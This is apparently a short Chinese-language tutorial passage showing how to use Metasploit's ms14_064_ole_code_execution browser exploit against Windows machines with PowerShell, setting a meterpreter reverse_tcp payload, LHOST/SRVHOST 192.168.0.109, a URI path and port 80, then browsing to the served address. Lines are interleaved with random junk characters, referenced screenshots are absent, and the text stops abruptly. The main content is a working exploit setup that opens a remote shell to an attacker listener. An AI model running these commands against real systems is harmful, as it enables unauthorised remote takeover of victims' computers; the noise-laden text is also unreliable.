0 [6 ]- w; H; Y! h3 P4 U9 W) G 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示) i7 W$ n2 e4 k! C
7 Q* f6 S; \% s0 V
" [9 }2 ]& }6 ?" G 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: + }( w6 B) V }; S
- |/ j- a; b( b$ b1 }; q8 K4 O, K
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
4 J3 [ m' n* e- \/ f# r
# B/ k% U' I3 H$ J# U( e9 N
8 r, @3 T) V) y% z( y; a0 J
set AllowPowershellPrompt true5 `1 w4 t- l; x! n! Z' R% K
1 N4 Q7 \6 \: o/ g# L5 b6 o
! {3 H- p# A' @4 C- I8 k ^& h: P
Set LHOST 192.168.0.109
5 S- [" R/ q2 Z M6 Y
& i- y, N* E6 P8 D
: L. c' i* f- p: h" F8 o. _ set SRVHOST 192.168.0.109
1 l" n" W1 H5 D& r% o, ^6 ^
- y" x' j$ @4 D8 ?
' w: j! y y$ v8 ? Set uripath share- n, [; e: S* J1 ?" R4 W
+ |, b1 E' [7 g2 y" P' `8 P
% d" \# w' W& C# k* H9 l Set srvport 80
7 [ F# C( B7 `* W
' ~2 l3 D. d& R2 i8 @( Q
3 G; y( |/ ~/ x, {1 {! ~$ u4 y
1 m/ W; ~/ ~2 j# h4 M9 q" j
" m1 d. p a( |- K: F
% ^; j" I9 m9 j0 n# `- |
3 G! H t) P0 M/ `$ }
! m) ~ e4 k" k$ u# v
2 [5 J- A1 @4 c4 t ! z. ~5 o7 x+ V/ ?% E+ S0 L6 @# s
' t* A* k$ k7 n$ Y1 n6 |+ b5 p$ k5 I9 K/ h+ _ e
4 x0 k, k5 M/ a" A* x9 N6 e5 C8 C
& a! I* W' k( ?3 y& W4 a5 A7 Z% e( w7 Y$ f! H+ X; J8 h
5 Z; Q8 a0 x0 J" s$ s# U* v
7 P: f1 _* K% v7 c/ }& S [
, R" T: y7 E2 I8 [7 s& L6 d
下面我们来访问本地地址如图:4 t0 S. S% F3 x5 ?
u/ g9 T. a" Z' G
3 E* c! t2 E3 r, O+ a9 F
( B8 G% L, B9 n, R- g$ K
% p2 d# _5 F" U- \0 S2 I/ U6 i' j% G; N7 H1 }
( i! w, U% u8 f
( x1 |! G# B6 _) I5 K) _) _2 L
. p9 z _6 f: C+ J& r- T; W
: i# f* l, Q, M